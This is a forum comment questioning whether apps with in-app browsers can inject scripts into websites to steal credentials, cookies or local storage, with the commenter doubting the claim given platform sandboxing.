Comment by armchairhacker

Can they really though?

I mean, this is literally XSS. And it's not just Facebook and Tiktok, unless this is a private API scummy apps can and are (I guarantee) doing this to steal user passwords and bank credentials. Your average person already needs to know that they can't type in their credentials unless the URL says facebook.com, now they also need to check the app is Safari. And you may not even need to enter credentials, a malicious app could just load my-bank.com and extract the cookies or local storage or send API requests.

If true...wow. That's a massive security oversight. But it seems to massive I'm not 100% convinced. Especially because websites are tightly sandboxed from other websites and apps are tightly sandboxed from other apps. Yeah you could in theory re-implement your own web browser in your app which looks and acts like Safari, but in practice Apple technically forbids other web-views, and it's really hard to fully implement a web browser and not make it immediately apparent anyways.